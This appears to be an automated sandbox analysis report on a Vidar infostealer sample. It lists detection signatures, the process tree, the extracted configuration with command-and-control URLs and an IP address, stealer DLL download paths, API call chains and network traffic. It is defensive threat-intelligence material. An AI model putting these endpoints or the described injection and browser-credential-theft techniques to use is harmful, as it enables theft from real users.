Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:	file.exe
Analysis ID:	1453785
MD5:	7dc8189f70cc34e18ea7af8fdeac4142
SHA1:	8cb698efdf5971e0805dd0f0fb0457315490c777
SHA256:	a3608a51db9df14c42f8c6e37ac49969de70b4be0862d82b5823c00aed395f9d
Tags:	exe
Infos:

Detection

Vidar

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Yara detected AntiVM3

Yara detected Powershell download and execute

Yara detected Vidar stealer

AI detected suspicious sample

Allocates memory in foreign processes

C2 URLs / IPs found in malware configuration

Contains functionality to inject code into remote processes

Injects a PE file into a foreign processes

Machine Learning detection for sample

Searches for specific processes (likely to inject)

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to harvest and steal browser information (history, passwords, etc)

Writes to foreign memory regions

AV process strings found (often used to terminate AV products)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to dynamically determine API calls

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality to record screenshots

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Creates a process in suspended mode (likely to inject code)

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Drops PE files

Extensive use of GetProcAddress (often used to hide API calls)

Found dropped PE file which has not been started or loaded

Found evasive API chain (date check)

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

PE / OLE file has an invalid certificate

PE file contains sections with non-standard names

Queries information about the installed CPU (vendor, model number etc)

Queries the volume information (name, serial number etc) of a device

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses code obfuscation techniques (call, push, ret)

Uses the keyboard layout for branch decision (may execute only for specific keyboard layouts)

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

file.exe (PID: 6360 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 7DC8189F70CC34E18EA7AF8FDEAC4142)

RegAsm.exe (PID: 2780 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Vidar	Vidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser.	No Attribution	https://0x00-0x7f.github.io/A-Case-of-Vidar-Infostealer-Part-1-(-Unpacking-)/ https://0x00-0x7f.github.io/A-Case-of-Vidar-Infostealer-Part-2/ https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/vidar-stealer-h-and-m-campaign https://0xtoxin.github.io/malware%20analysis/Vidar-Stealer-Campaign/ https://asec.ahnlab.com/en/22932/	https://malpedia.caad.fkie.fraunhofer.de/details/win.vidar

Malware Configuration

Threatname: Vidar

{"C2 url": ["https://steamcommunity.com/profiles/76561199698764354", "https://t.me/r8z0l"], "Botnet": "8bd2ac5f1dd228859ac690a79c0bde71"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000000.00000002.2070870185.0000000001023000.00000004.00000001.01000000.00000003.sdmp	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
00000002.00000002.3325415366.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
00000002.00000002.3325415366.0000000000400000.00000040.00000400.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation	Detects executables containing potential Windows Defender anti-emulation checks	ditekSHen	0x231f0:$s1: JohnDoe 0x231e8:$s2: HAL9TH
Process Memory Space: file.exe PID: 6360	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
Process Memory Space: file.exe PID: 6360	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
Process Memory Space: RegAsm.exe PID: 2780	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
Process Memory Space: RegAsm.exe PID: 2780	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
Process Memory Space: RegAsm.exe PID: 2780	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: RegAsm.exe PID: 2780	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Click to see the 4 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
2.2.RegAsm.exe.400000.0.raw.unpack	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
2.2.RegAsm.exe.400000.0.raw.unpack	INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation	Detects executables containing potential Windows Defender anti-emulation checks	ditekSHen	0x231f0:$s1: JohnDoe 0x231e8:$s2: HAL9TH
2.2.RegAsm.exe.400000.0.unpack	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
2.2.RegAsm.exe.400000.0.unpack	INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation	Detects executables containing potential Windows Defender anti-emulation checks	ditekSHen	0x225f0:$s1: JohnDoe 0x225e8:$s2: HAL9TH
0.2.file.exe.ff0000.0.unpack	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
0.2.file.exe.ff0000.0.unpack	INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation	Detects executables containing potential Windows Defender anti-emulation checks	ditekSHen	0x53c30:$s1: JohnDoe 0x53c28:$s2: HAL9TH
Click to see the 1 entries

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: https://116.202.190.18:5432/softokn3.dllP	Avira URL Cloud: Label: malware
Source: https://116.202.190.18/	Avira URL Cloud: Label: malware
Source: https://116.202.190.18:5432/softokn3.dll	Avira URL Cloud: Label: malware
Source: https://116.202.190.18:5432/msvcp140.dlldge	Avira URL Cloud: Label: malware
Source: https://116.202.190.18:5432/vcruntime140.dllIQ=E	Avira URL Cloud: Label: malware
Source: https://116.202.190.18:5432/softokn3.dllZ	Avira URL Cloud: Label: malware
Source: https://116.202.190.18:5432/freebl3.dllEdge	Avira URL Cloud: Label: malware
Source: https://116.202.190.18:5432/sqls.dll	Avira URL Cloud: Label: malware
Source: https://116.202.190.18:5432/freebl3.dlla	Avira URL Cloud: Label: malware
Source: https://116.202.190.18:5432/reebl3.dll	Avira URL Cloud: Label: malware
Source: https://116.202.190.18:5432/mozglue.dllEdge	Avira URL Cloud: Label: malware
Source: https://t.me/r8z0l	Avira URL Cloud: Label: malware
Source: https://116.202.190.18:5432/freebl3.dll	Avira URL Cloud: Label: malware
Source: https://116.202.190.18:5432/vcruntime140.dll9	Avira URL Cloud: Label: malware
Source: https://116.202.190.18:5432/nss3.dll	Avira URL Cloud: Label: malware
Source: https://116.202.190.18:5432/mozglue.dlls	Avira URL Cloud: Label: malware
Source: https://116.202.190.18:5432/vcruntime140.dllser	Avira URL Cloud: Label: malware
Source: https://116.202.190.18:5432/vcruntime140.dll/	Avira URL Cloud: Label: malware
Source: https://116.202.190.18:5432/sqls.dllx	Avira URL Cloud: Label: malware
Source: https://116.202.190.18:5432/vcruntime140.dll	Avira URL Cloud: Label: malware
Source: https://116.202.190.18:5432	Avira URL Cloud: Label: malware
Source: https://116.202.190.18:5432/	Avira URL Cloud: Label: malware
Source: https://116.202.190.18:5432/.190.18:5432/	Avira URL Cloud: Label: malware
Source: https://116.202.190.18:5432/oft	Avira URL Cloud: Label: malware
Source: https://116.202.190.18:5432/My	Avira URL Cloud: Label: malware
Source: https://116.202.190.18:5432/nss3.dllO	Avira URL Cloud: Label: malware
Source: https://116.202.190.18:5432/mozglue.dll	Avira URL Cloud: Label: malware
Source: https://116.202.190.18:5432/softokn3.dllOMh	Avira URL Cloud: Label: malware
Source: https://116.202.190.18:5432/nss3.dllft	Avira URL Cloud: Label: malware
Source: https://116.202.190.18:5432/msvcp140.dll	Avira URL Cloud: Label: malware
Source: https://116.202.190.18:5432/vcruntime140.dllUser	Avira URL Cloud: Label: malware
Source: https://116.202.190.18:5432/ng	Avira URL Cloud: Label: malware
Source: https://116.202.190.18:5432/softokn3.dlldge	Avira URL Cloud: Label: malware
Source: https://steamcommunity.com/profiles/76561199698764354	Avira URL Cloud: Label: malware

Found malware configuration

Source: 00000002.00000002.3325415366.0000000000400000.00000040.00000400.00020000.00000000.sdmp

Malware Configuration Extractor: Vidar {"C2 url": ["https://steamcommunity.com/profiles/76561199698764354", "https://t.me/r8z0l"], "Botnet": "8bd2ac5f1dd228859ac690a79c0bde71"}

Multi AV Scanner detection for submitted file

Source: file.exe

ReversingLabs: Detection: 26%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for sample

Source: file.exe

Joe Sandbox ML: detected

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_00406DE2 CryptUnprotectData,LocalAlloc,LocalFree,	2_2_00406DE2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0040245C memset,CryptStringToBinaryA,CryptStringToBinaryA,CryptStringToBinaryA,	2_2_0040245C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_00411B94 CryptBinaryToStringA,GetProcessHeap,HeapAlloc,CryptBinaryToStringA,	2_2_00411B94
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_00406D7F CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,	2_2_00406D7F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_00408E1E memset,lstrlenA,CryptStringToBinaryA,memcpy,lstrcat,lstrcat,	2_2_00408E1E

Source: file.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown

HTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.5:49708 version: TLS 1.2

Source: file.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source:

Binary string: C:\Users\Dan\Desktop\work\sqlite\tmp\sqlite_bld_dir\2\sqlite3.pdb source: RegAsm.exe, 00000002.00000002.3327352173.0000000015922000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3331334896.000000001B898000.00000002.00001000.00020000.00000000.sdmp, sqls[1].dll.2.dr

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0100D5B1 FindFirstFileExW,	0_2_0100D5B1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0040D2FF _EH_prolog,FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	2_2_0040D2FF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0040C0F8 _EH_prolog,FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,	2_2_0040C0F8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_00401162 _EH_prolog,FindFirstFileA,StrCmpCA,StrCmpCA,FindFirstFileA,FindNextFileA,FindClose,FindNextFileA,FindClose,	2_2_00401162
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0040A17A _EH_prolog,FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,	2_2_0040A17A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_00417295 _EH_prolog,GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlenA,lstrlenA,	2_2_00417295
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0040A595 _EH_prolog,StrCmpCA,FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,	2_2_0040A595
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0040B616 _EH_prolog,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlenA,FindNextFileA,FindClose,	2_2_0040B616
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_004176DE _EH_prolog,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,	2_2_004176DE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_00416824 _EH_prolog,wsprintfA,FindFirstFileA,memset,memset,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,memset,lstrcat,strtok_s,memset,lstrcat,PathMatchSpecA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,strtok_s,FindNextFileA,FindClose,	2_2_00416824
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0040AC07 _EH_prolog,FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,	2_2_0040AC07
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_00416EF1 _EH_prolog,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,	2_2_00416EF1

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 2_2_00416C71 _EH_prolog,GetLogicalDriveStringsA,memset,GetDriveTypeA,lstrcpy,lstrcpy,lstrcpy,lstrlenA,

2_2_00416C71

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\	Jump to behavior

Networking

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: https://steamcommunity.com/profiles/76561199698764354
Source: Malware configuration extractor	URLs: https://t.me/r8z0l

Source: global traffic

TCP traffic: 192.168.2.5:49709 -> 116.202.190.18:5432

Source: global traffic

HTTP traffic detected: GET /r8z0l HTTP/1.1Host: t.meConnection: Keep-AliveCache-Control: no-cache

Source: Joe Sandbox View	IP Address: 149.154.167.99 149.154.167.99
Source: Joe Sandbox View	IP Address: 149.154.167.99 149.154.167.99

Source: Joe Sandbox View

ASN Name: TELEGRAMRU TELEGRAMRU

Source: Joe Sandbox View

JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: unknown	TCP traffic detected without corresponding DNS query: 116.202.190.18
Source: unknown	TCP traffic detected without corresponding DNS query: 116.202.190.18
Source: unknown	TCP traffic detected without corresponding DNS query: 116.202.190.18
Source: unknown	TCP traffic detected without corresponding DNS query: 116.202.190.18
Source: unknown	TCP traffic detected without corresponding DNS query: 116.202.190.18
Source: unknown	TCP traffic detected without corresponding DNS query: 116.202.190.18
Source: unknown	TCP traffic detected without corresponding DNS query: 116.202.190.18
Source: unknown	TCP traffic detected without corresponding DNS query: 116.202.190.18
Source: unknown	TCP traffic detected without corresponding DNS query: 116.202.190.18
Source: unknown	TCP traffic detected without corresponding DNS query: 116.202.190.18
Source: unknown	TCP traffic detected without corresponding DNS query: 116.202.190.18
Source: unknown	TCP traffic detected without corresponding DNS query: 116.202.190.18
Source: unknown	TCP traffic detected without corresponding DNS query: 116.202.190.18
Source: unknown	TCP traffic detected without corresponding DNS query: 116.202.190.18
Source: unknown	TCP traffic detected without corresponding DNS query: 116.202.190.18
Source: unknown	TCP traffic detected without corresponding DNS query: 116.202.190.18
Source: unknown	TCP traffic detected without corresponding DNS query: 116.202.190.18
Source: unknown	TCP traffic detected without corresponding DNS query: 116.202.190.18
Source: unknown	TCP traffic detected without corresponding DNS query: 116.202.190.18
Source: unknown	TCP traffic detected without corresponding DNS query: 116.202.190.18
Source: unknown	TCP traffic detected without corresponding DNS query: 116.202.190.18
Source: unknown	TCP traffic detected without corresponding DNS query: 116.202.190.18
Source: unknown	TCP traffic detected without corresponding DNS query: 116.202.190.18
Source: unknown	TCP traffic detected without corresponding DNS query: 116.202.190.18
Source: unknown	TCP traffic detected without corresponding DNS query: 116.202.190.18
Source: unknown	TCP traffic detected without corresponding DNS query: 116.202.190.18
Source: unknown	TCP traffic detected without corresponding DNS query: 116.202.190.18
Source: unknown	TCP traffic detected without corresponding DNS query: 116.202.190.18
Source: unknown	TCP traffic detected without corresponding DNS query: 116.202.190.18
Source: unknown	TCP traffic detected without corresponding DNS query: 116.202.190.18
Source: unknown	TCP traffic detected without corresponding DNS query: 116.202.190.18
Source: unknown	TCP traffic detected without corresponding DNS query: 116.202.190.18
Source: unknown	TCP traffic detected without corresponding DNS query: 116.202.190.18
Source: unknown	TCP traffic detected without corresponding DNS query: 116.202.190.18
Source: unknown	TCP traffic detected without corresponding DNS query: 116.202.190.18
Source: unknown	TCP traffic detected without corresponding DNS query: 116.202.190.18
Source: unknown	TCP traffic detected without corresponding DNS query: 116.202.190.18
Source: unknown	TCP traffic detected without corresponding DNS query: 116.202.190.18
Source: unknown	TCP traffic detected without corresponding DNS query: 116.202.190.18
Source: unknown	TCP traffic detected without corresponding DNS query: 116.202.190.18
Source: unknown	TCP traffic detected without corresponding DNS query: 116.202.190.18
Source: unknown	TCP traffic detected without corresponding DNS query: 116.202.190.18
Source: unknown	TCP traffic detected without corresponding DNS query: 116.202.190.18
Source: unknown	TCP traffic detected without corresponding DNS query: 116.202.190.18
Source: unknown	TCP traffic detected without corresponding DNS query: 116.202.190.18
Source: unknown	TCP traffic detected without corresponding DNS query: 116.202.190.18
Source: unknown	TCP traffic detected without corresponding DNS query: 116.202.190.18
Source: unknown	TCP traffic detected without corresponding DNS query: 116.202.190.18
Source: unknown	TCP traffic detected without corresponding DNS query: 116.202.190.18
Source: unknown	TCP traffic detected without corresponding DNS query: 116.202.190.18

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 2_2_004041B2 _EH_prolog,GetProcessHeap,RtlAllocateHeap,InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,InternetSetOptionA,HttpSendRequestA,HttpQueryInfoA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,

2_2_004041B2

Source: global traffic

HTTP traffic detected: GET /r8z0l HTTP/1.1Host: t.meConnection: Keep-AliveCache-Control: no-cache

Source: global traffic	DNS traffic detected: DNS query: t.me
Source: global traffic	DNS traffic detected: DNS query: 198.187.3.20.in-addr.arpa

Source: file.exe	String found in binary or memory: http://aia.entrust.net/ts1-chain256.cer01
Source: file.exe	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
Source: file.exe	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: file.exe	String found in binary or memory: http://crl.entrust.net/2048ca.crl0
Source: file.exe	String found in binary or memory: http://crl.entrust.net/ts1ca.crl0
Source: file.exe	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
Source: file.exe	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: file.exe	String found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
Source: RegAsm.exe, 00000002.00000002.3326265923.0000000001193000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
Source: RegAsm.exe, 00000002.00000002.3326265923.00000000011C9000.00000004.00000020.00020000.00000000.sdmp, 77EC63BDA74BD0D0E0426DC8F80085060.2.dr	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: file.exe	String found in binary or memory: http://ocsp.digicert.com0
Source: file.exe	String found in binary or memory: http://ocsp.digicert.com0A
Source: file.exe	String found in binary or memory: http://ocsp.entrust.net02
Source: file.exe	String found in binary or memory: http://ocsp.entrust.net03
Source: file.exe	String found in binary or memory: http://www.digicert.com/CPS0
Source: file.exe	String found in binary or memory: http://www.entrust.net/rpa03
Source: RegAsm.exe, 00000002.00000002.3331463797.000000001B8CD000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3327352173.0000000015922000.00000004.00000020.00020000.00000000.sdmp, sqls[1].dll.2.dr	String found in binary or memory: http://www.sqlite.org/copyright.html.
Source: RegAsm.exe, 00000002.00000002.3326444422.00000000011EC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://116.202.190.18/
Source: RegAsm.exe, 00000002.00000002.3326265923.0000000001193000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://116.202.190.18:5432
Source: RegAsm.exe, 00000002.00000002.3325415366.00000000004D5000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3326444422.00000000011EC000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3326684704.0000000001397000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3326265923.0000000001193000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://116.202.190.18:5432/
Source: RegAsm.exe, 00000002.00000002.3326444422.00000000011EC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://116.202.190.18:5432/.190.18:5432/
Source: RegAsm.exe, 00000002.00000002.3326684704.0000000001397000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://116.202.190.18:5432/My
Source: RegAsm.exe, 00000002.00000002.3326524144.000000000129E000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3325415366.00000000004D5000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://116.202.190.18:5432/freebl3.dll
Source: RegAsm.exe, 00000002.00000002.3325415366.00000000004D5000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://116.202.190.18:5432/freebl3.dllEdge
Source: RegAsm.exe, 00000002.00000002.3326524144.000000000129E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://116.202.190.18:5432/freebl3.dlla
Source: RegAsm.exe, 00000002.00000002.3326524144.000000000129E000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3325415366.00000000004D5000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://116.202.190.18:5432/mozglue.dll
Source: RegAsm.exe, 00000002.00000002.3325415366.00000000004D5000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://116.202.190.18:5432/mozglue.dllEdge
Source: RegAsm.exe, 00000002.00000002.3326524144.000000000129E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://116.202.190.18:5432/mozglue.dlls
Source: RegAsm.exe, 00000002.00000002.3325415366.00000000004D5000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3326524144.0000000001280000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://116.202.190.18:5432/msvcp140.dll
Source: RegAsm.exe, 00000002.00000002.3325415366.00000000004D5000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://116.202.190.18:5432/msvcp140.dlldge
Source: RegAsm.exe, 00000002.00000002.3326684704.0000000001397000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://116.202.190.18:5432/ng
Source: RegAsm.exe, 00000002.00000002.3326265923.00000000011C9000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3326524144.000000000129E000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3325415366.00000000004D5000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://116.202.190.18:5432/nss3.dll
Source: RegAsm.exe, 00000002.00000002.3326684704.0000000001397000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://116.202.190.18:5432/nss3.dllO
Source: RegAsm.exe, 00000002.00000002.3325415366.00000000004D5000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://116.202.190.18:5432/nss3.dllft
Source: RegAsm.exe, 00000002.00000002.3326444422.00000000011EC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://116.202.190.18:5432/oft
Source: RegAsm.exe, 00000002.00000002.3326444422.00000000011EC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://116.202.190.18:5432/reebl3.dll
Source: RegAsm.exe, 00000002.00000002.3325415366.00000000004D5000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3326444422.00000000011EC000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3326524144.0000000001280000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://116.202.190.18:5432/softokn3.dll
Source: RegAsm.exe, 00000002.00000002.3326524144.0000000001280000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://116.202.190.18:5432/softokn3.dllOMh
Source: RegAsm.exe, 00000002.00000002.3326524144.0000000001280000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://116.202.190.18:5432/softokn3.dllP
Source: RegAsm.exe, 00000002.00000002.3326444422.00000000011EC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://116.202.190.18:5432/softokn3.dllZ
Source: RegAsm.exe, 00000002.00000002.3325415366.00000000004D5000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://116.202.190.18:5432/softokn3.dlldge
Source: RegAsm.exe, 00000002.00000002.3325415366.0000000000491000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3326524144.000000000129E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://116.202.190.18:5432/sqls.dll
Source: RegAsm.exe, 00000002.00000002.3326524144.000000000129E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://116.202.190.18:5432/sqls.dllx
Source: RegAsm.exe, 00000002.00000002.3326524144.0000000001268000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3325415366.000000000056E000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3326444422.00000000011EC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://116.202.190.18:5432/vcruntime140.dll
Source: RegAsm.exe, 00000002.00000002.3326444422.00000000011EC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://116.202.190.18:5432/vcruntime140.dll/
Source: RegAsm.exe, 00000002.00000002.3326444422.00000000011EC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://116.202.190.18:5432/vcruntime140.dll9
Source: RegAsm.exe, 00000002.00000002.3326444422.00000000011EC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://116.202.190.18:5432/vcruntime140.dllIQ=E
Source: RegAsm.exe, 00000002.00000002.3325415366.000000000056E000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://116.202.190.18:5432/vcruntime140.dllUser
Source: RegAsm.exe, 00000002.00000002.3325415366.00000000004D5000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://116.202.190.18:5432/vcruntime140.dllser
Source: RegAsm.exe, 00000002.00000002.3325415366.000000000056E000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://116.202.190.18:5432A
Source: RegAsm.exe, 00000002.00000002.3325415366.0000000000497000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://116.202.190.18:5432AMicrosoft
